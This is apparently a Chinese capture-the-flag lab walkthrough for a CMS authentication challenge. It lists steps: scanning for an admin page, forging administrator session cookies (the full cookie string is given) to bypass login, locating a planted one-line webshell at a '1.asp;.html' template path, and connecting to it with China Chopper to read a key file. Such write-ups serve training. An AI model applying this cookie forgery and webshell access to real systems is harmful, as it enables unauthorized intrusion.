CMS系统漏洞分析溯源(第4题)
难易程度:★★★
题目类型:身份认证和会话管理
使用工具:FireFox浏览器、wwwscan、菜刀
1.打开靶场,用wwwscan扫一下。
发现后台/admin/home.asp
2.访问后台http://219.153.49.228:49339/admin/home.asp,显示还没有登陆。
3.使用cookie-editor,伪造cookie,添加username=admin; ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEENHHMJHKLG; LanguageAlias=cn; LanguagePath=%2F; languageID=1; adminId=1; adminName=admin; groupMenu=1%2C+70%2C+10%2C+11%2C+12%2C+13%2C+14%2C+20%2C+68%2C+15%2C+16%2C+17%2C+18%2C+3%2C+25%2C+57%2C+58%2C+59%2C+2%2C+21%2C+22%2C+23%2C+24%2C+4%2C+27%2C+28%2C+29%2C+5%2C+49%2C+52%2C+56%2C+30%2C+51%2C+53%2C+54%2C+55%2C+188%2C+67%2C+63%2C+190%2C+184%2C+86%2C+6%2C+32%2C+33%2C+34%2C+8%2C+37%2C+183%2C+38%2C+60%2C+9; GroupName=%B3%AC%BC%B6%B9%DC%C0%ED%D4%B1%D7%E9
刷新页面,成功进入后台。
3.选择界风格-编辑模板/CSS文件,点击编辑1.asp;.html,发现一句话木马。
4.打开菜刀连接,url为
http://219.153.49.228:49339/Templates/green/html/1.asp;.html,密码为chopper。
5.在C盘根目录下,找到key文件,打开获取key。